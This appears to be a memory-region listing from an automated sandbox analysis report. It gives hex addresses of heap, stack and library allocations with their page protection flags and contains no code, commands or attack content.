7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
177588B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1A746000
|
unkown
|
page readonly
|
||
|
1776F4A0000
|
heap
|
page read and write
|
||
|
2AB0FA74000
|
heap
|
page read and write
|
||
|
2AB0FA88000
|
heap
|
page read and write
|
||
|
1776F5D0000
|
heap
|
page read and write
|
||
|
2AB0FA15000
|
heap
|
page read and write
|
||
|
2AB0DC05000
|
heap
|
page read and write
|
||
|
177588A3000
|
trusted library allocation
|
page read and write
|
||
|
17756D50000
|
trusted library allocation
|
page read and write
|
||
|
177553F4000
|
heap
|
page read and write
|
||
|
17767224000
|
trusted library allocation
|
page read and write
|
||
|
1776F37D000
|
heap
|
page read and write
|
||
|
509AD7F000
|
stack
|
page read and write
|
||
|
17755440000
|
heap
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7C3000
|
trusted library allocation
|
page read and write
|
||
|
17758ACE000
|
trusted library allocation
|
page read and write
|
||
|
1C83A966000
|
heap
|
page read and write
|
||
|
177575A6000
|
trusted library allocation
|
page read and write
|
||
|
FBE50FA000
|
stack
|
page read and write
|
||
|
2AB0FC55000
|
heap
|
page read and write
|
||
|
17755449000
|
heap
|
page read and write
|
||
|
1C83A9B0000
|
heap
|
page execute and read and write
|
||
|
17755481000
|
heap
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FB4D000
|
heap
|
page read and write
|
||
|
2AB0DD20000
|
heap
|
page read and write
|
||
|
7FFAAC4FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1A746000
|
unkown
|
page readonly
|
||
|
7FFAAC600000
|
trusted library allocation
|
page execute and read and write
|
||
|
17756D60000
|
heap
|
page read and write
|
||
|
17758B54000
|
trusted library allocation
|
page read and write
|
||
|
1775547D000
|
heap
|
page read and write
|
||
|
2AB0FB47000
|
heap
|
page read and write
|
||
|
2AB0F9EE000
|
heap
|
page read and write
|
||
|
1776F2D0000
|
heap
|
page read and write
|
||
|
509B37E000
|
stack
|
page read and write
|
||
|
2AB0FBD1000
|
heap
|
page read and write
|
||
|
177582C9000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA5B000
|
heap
|
page read and write
|
||
|
2AB0FA0E000
|
heap
|
page read and write
|
||
|
2AB0FB36000
|
heap
|
page read and write
|
||
|
1776F61E000
|
heap
|
page read and write
|
||
|
2AB0DD71000
|
heap
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1A731000
|
unkown
|
page execute read
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
|
1776F5F2000
|
heap
|
page read and write
|
||
|
17755489000
|
heap
|
page read and write
|
||
|
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
|
9457DCE000
|
stack
|
page read and write
|
||
|
1776F1B2000
|
heap
|
page read and write
|
There are 409 hidden memdumps, click here to show them.